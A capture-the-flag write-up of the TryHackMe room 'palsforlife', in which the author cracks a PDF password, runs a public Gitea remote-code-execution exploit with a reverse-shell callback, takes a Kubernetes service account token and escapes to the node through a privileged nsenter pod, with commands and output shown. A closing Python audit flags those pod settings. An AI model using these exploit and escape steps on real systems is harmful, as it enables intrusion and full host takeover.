[THM] palsforlife

Marcelo Clavel
4 min read · Oct 4, 2021


url: https://tryhackme.com/room/palsforlife

difficulty: Medium

“Abuse a misconfigured Kubernetes cluster”

First move: a port scan with nmap.

Ports:
22/tcp    open  ssh           -> ssh service
6443/tcp  open  sun-sr-https  -> k8s API (k3s)
10250/tcp open                -> kubelet API
30180/tcp open                -> nginx web
31111/tcp open                -> gitea web
31112/tcp open                -> gitea ssh (?)

Looking at the git service (Gitea, port 31111), we can see this user:

user: leeroy
mail: leeroy@jenki.ns
[screenshot: Gitea users page]

Now we focus on the webserver (nginx, port 30180). I used gobuster to try to find something. After a few minutes, I found the /team/ path.

[screenshot: /team/ page]

In the source code, we can see a strange base64-encoded blob.

I copied the blob into index.b64 and decoded it:

cat index.b64 | base64 -d > index.pdf

I tried to open the PDF, but it needs a password. For this job I used john.

┌──(root💀6395bd32f1c4)-[/mnt]
└─# /usr/share/john/pdf2john.pl index.pdf > hashpdf
┌──(root💀6395bd32f1c4)-[/mnt]
└─# john --wordlist=rockyou.txt hashpdf
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 6 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
XXXXXXXXXXXX (index.pdf)
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed

We found the password; opening the file, we can see a string.

[screenshot: index.pdf]

I used this string as the password to log in with that user on the git service. Looking at some repos and configs, it's possible to get the first flag.

[screenshot: flag1]

The next step: get more info about the Gitea service. I found this exploit: https://www.exploit-db.com/exploits/49571

┌──(root💀6395bd32f1c4)-[/mnt]
└─# python3 49571.py -t http://10.10.76.180:31111 -u leeroy -p "XXXXXXXXX" -I 10.9.0.XX -P 4445
_____ _ _______
/ ____(_)__ __| CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
\_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5
[+] Starting exploit ...
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /tmp/tmp.SNSwbhH9Ge/.git/
[master (root-commit) 1cd23c8] Initial commit
1 file changed, 1 insertion(+)
create mode 100644 README.md
Enumerating objects: 3, done.
Counting objects: 100% (3/3), done.
Writing objects: 100% (3/3), 246 bytes | 246.00 KiB/s, done.
[+] Exploit completed !

Now we have a shell and the second flag.

bash-4.4$ whoami
whoami
git
bash-4.4$ pwd
pwd
/data/git
bash-4.4$ ls /root/
ls /root/
flag2.txt
bash-4.4$ cat /root/flag2.txt
cat /root/flag2.txt
flag{XXXXXXXXXXXXXX}

The CTF is about Kubernetes, so I tried to find credentials inside the pod. Looking at the directory /var/run/secrets/kubernetes.io/serviceaccount, we find ca.crt and the token for the service account.

Using kubectl it's possible to talk to the k8s API (thanks to the gitea service account).

kubectl config set-cluster pals --server=<server> --certificate-authority=ca.crt
kubectl config set-context pals --cluster=pals
kubectl config set-credentials user --token=<token>
kubectl config set-context pals --user=user
kubectl config use-context pals

We found flag3 inside a secret in the kube-system namespace.

[screenshot: flag3]

Finally, I tried to get root on the host node (the cluster only has one node). I used a script to run a privileged pod on the node. The node has no internet access, so I reused the same image digest as the nginx webserver, which is already present on the node.

https://gist.github.com/jjo/a8243c677f7e79f2f1d610f02365fdd7

┌──(root💀6395bd32f1c4)-[/mnt/kubernetes]
└─# bash kubectl-root-in-host.sh palsforlife
+ kubectl run sudo-palsforlife --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"nodeSelector": { "kubernetes.io/hostname": "palsforlife" },
"tolerations": [
{ "effect": "NoSchedule", "key": "node-role.kubernetes.io/master" },
{ "effect": "NoSchedule", "key": "node-role.kubernetes.io/controlplane" },
{ "effect": "NoExecute", "key": "node-role.kubernetes.io/etcd" }
],
"containers": [
{
"name": "nginx",
"image": "nginx@sha256:6d75c99af15565a301e48297fa2d121e15d80ad526f8369c526324f0f7ccb750",
"imagePullPolicy": "Never",
"command": [
"nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"
],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
# whoami
root
# hostname
palsforlife
# cat /root/root.txt
flag{XXXXXXXXXXXX}
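Both the mounted service account token (found under /var/run/secrets/kubernetes.io/serviceaccount earlier) and the privileged pod override above are settings a cluster admin can reject before the pod is ever scheduled. The following Python is an added example, not code from the original post nor from the kubectl-root-in-host gist it links: an admission-style audit that walks a pod spec for hostPID, hostNetwork, hostIPC, hostPath volumes, privileged containers, nsenter on the command line and a still-mounted service account token. Both pod specs in it are constructed: the first mirrors the override JSON shown in the writeup, the second is a hardened spec with a placeholder image tag.

```python
"""Admission-style audit of Kubernetes pod specs for node-escape settings.

Added example for this writeup; it is not code from the original post nor
from the kubectl-root-in-host gist linked above. Both pod specs below are
constructed: the first mirrors the override JSON shown in the writeup, the
second is a hardened spec with a placeholder image tag.
"""
import json
from typing import Dict, List

# Constructed from the override JSON in the writeup (same image digest).
ESCAPE_POD: Dict = json.loads("""
{
  "apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "sudo-palsforlife"},
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [{
      "name": "nginx",
      "image": "nginx@sha256:6d75c99af15565a301e48297fa2d121e15d80ad526f8369c526324f0f7ccb750",
      "imagePullPolicy": "Never",
      "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-"],
      "securityContext": {"privileged": true}
    }]
  }
}
""")

# Constructed hardened spec: no host namespaces, no privilege, no token mount.
HARDENED_POD: Dict = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "gitea"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{
            "name": "gitea",
            "image": "gitea/gitea:<pinned-version>",  # placeholder tag
            "securityContext": {
                "privileged": False,
                "allowPrivilegeEscalation": False,
                "runAsNonRoot": True,
            },
        }],
    },
}


def audit_pod(pod: Dict) -> List[str]:
    """Return one finding per setting that would let the pod reach the node."""
    findings: List[str] = []
    spec = pod.get("spec", {})

    # Host namespaces: hostPID is what makes nsenter into PID 1 possible.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{flag}: pod shares the node's namespace")

    # The API default is true, so the token under
    # /var/run/secrets/kubernetes.io/serviceaccount is mounted unless disabled.
    if spec.get("automountServiceAccountToken", True):
        findings.append("automountServiceAccountToken: service account token is mounted")

    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"volume {vol.get('name')}: hostPath mount of the node filesystem")

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"container {c.get('name')}: privileged")
        argv = list(c.get("command", [])) + list(c.get("args", []))
        if "nsenter" in argv:
            findings.append(f"container {c.get('name')}: nsenter in command line")
    return findings


def should_admit(pod: Dict) -> bool:
    """Policy decision a validating webhook would return: admit only clean specs."""
    return not audit_pod(pod)


if __name__ == "__main__":
    for pod in (ESCAPE_POD, HARDENED_POD):
        name = pod["metadata"]["name"]
        verdict = "ADMIT" if should_admit(pod) else "DENY"
        print(f"{name}: {verdict}")
        for finding in audit_pod(pod):
            print("  -", finding)
```

Run against the writeup's override, the audit reports five findings (hostPID, hostNetwork, the mounted token, the privileged container and nsenter) and denies the pod; the hardened spec is admitted. In a real cluster the same policy is enforced without custom code by the Pod Security Admission "restricted" profile, which rejects host namespaces and privileged containers, and by setting automountServiceAccountToken: false on pods that never talk to the API, which is what would have stopped the kubectl steps above from working from inside the gitea pod.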
